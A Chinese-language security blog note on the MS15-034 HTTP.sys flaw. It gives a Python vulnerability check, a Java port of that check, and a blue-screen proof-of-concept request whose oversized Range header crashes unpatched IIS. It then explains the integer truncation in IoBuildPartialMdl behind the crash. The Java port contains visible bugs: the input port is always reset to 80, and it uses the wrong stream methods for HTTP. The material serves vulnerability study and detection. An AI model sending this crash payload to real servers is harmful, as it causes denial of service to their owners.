零、MS15-034POC核心部分(参考巡风):
1 socket.setdefaulttimeout(timeout) 2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 s.connect((ip, int(port))) 4 flag = "GET / HTTP/1.0 Host: stuff Range: bytes=0-18446744073709551615 " 5 s.send(flag) 6 data = s.recv(1024) 7 s.close() 8 if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data: 9 print "vuln"
由于最近想学习java,所以修改了一版java的代码:
1 /* 2 * encoding:utf-8 3 * Author:chenran01; 4 * Email:crsecscu@gmail.com 5 */ 6 7 //import lib packages 8 import java.net.Socket; 9 import java.util.Scanner; 10 import java.io.*; 11 12 //define main class 13 public class HTTPSYS{ 14 public static String IP_ADDR = "127.0.0.1"; 15 public static int PORT = 80; 16 public static String Flag = "GET / HTTP/1.0 Host: stuff Range: bytes=0-18446744073709551615 "; 17 //Flag is the payload 18 public static void main(String[] args){ 19 System.out.print("Please input target IP:"); 20 Scanner input = new Scanner(System.in); 21 IP_ADDR = input.next(); 22 System.out.print("Please input target port:"); 23 try{ 24 PORT = System.in.read(); 25 }catch(Exception ex){ 26 System.out.printf("Error-Reason:%s",ex.toString()); 27 }finally{ 28 PORT = 80; 29 } 30 try{ 31 Socket socket = new Socket(IP_ADDR,PORT); 32 //创建socket 33 DataInputStream socketrecv = new DataInputStream(socket.getInputStream()); 34 DataOutputStream socketsend = new DataOutputStream(socket.getOutputStream()); 35 //创建输入输出对象 36 socketsend.writeUTF(Flag);//发送payload 37 String response_content = socketrecv.readUTF();//获取回显 38 if(response_content.indexOf("Server: Microsoft") != -1 && response_content.indexOf("Requested Range Not Satisfiable") != -1){ 39 System.out.print("有漏洞"); 40 }else{ 41 System.out.print("没有漏洞"); 42 } 43 }catch(Exception ex){ 44 System.out.printf("Error-Reason:%s",ex.toString()); 45 } 46 47 48 } 49 }
一、MS15-034 HTTP.sys漏洞原理考证:
原理部分参考:http://www.ijiandao.com/safe/cto/12821.html
1 #举例:蓝屏POC 2 """ 3 GET /welcome.png HTTP/1.1 4 Host: PoC 5 Range: bytes=12345-18446744073709551615 6 """
这个地方的Range字段在IIS内部HTTP!UlBuildFastRangeCacheMdlChain(用于生成响应报文的缓存MDL链,来描述HTTP响应的状态行、头部与消息体。)这个函数中会调用一次nt! IoBuildPartialMdl函数来生成MDL链。这这个函数里,会计算length这个值:
注意这里明确要求了由VirtualAddress与Length确定的区间必须是SourceMdl描述的缓冲区的一个自区间,正是对此要求的违反导致了此漏洞中的内存破坏。
第3次调用nt! IoBuildPartialMdl来生成消息体MDL时的参数如下:
SourceMdl = 0xfffffa801a38cb60
SourceMdl.VirtualAddress = 0xfffffa801ac94000
SourceMdl.ByteCount = 0x2d315
SourceMdl.ByteOffset = 0x0
TargetMdl = 0xfffffa801a2ed580
TargetMdl.VirtualAddress = 0xfffffa801ac97000
TargetMdl.ByteCount = 0xffffcfc7
TargetMdl.ByteOffset = 0x39
VirtualAddress = 0xfffffa801ac97039
Length = 0xffffcfc7这里的Length是根据HTTP请求消息头部中的Range字段计算得到的,过程如下:
首先,在HTTP!UlpParseRange中对Range字段进行解析,得到RangeBegin、RangeEnd;
然后,计算RangeLength = RangeEnd – RangeBegin + 1;
最后,将RangeLength截断为32位得到Length。
以PoC中的Range: bytes=12345-18446744073709551615为例:
RangeBegin = 12345 = 0x3039
RangeEnd = 18446744073709551615 = 0xffffffffffffffff
RangeLength = 0xffffffffffffffff – 0x00003039 + 1 = 0xffffffffffffcfc7
Length = 0xffffcfc7
显然由于Length超长而导致违反了nt! IoBuildPartialMdl的要求,进而造成内存破坏。
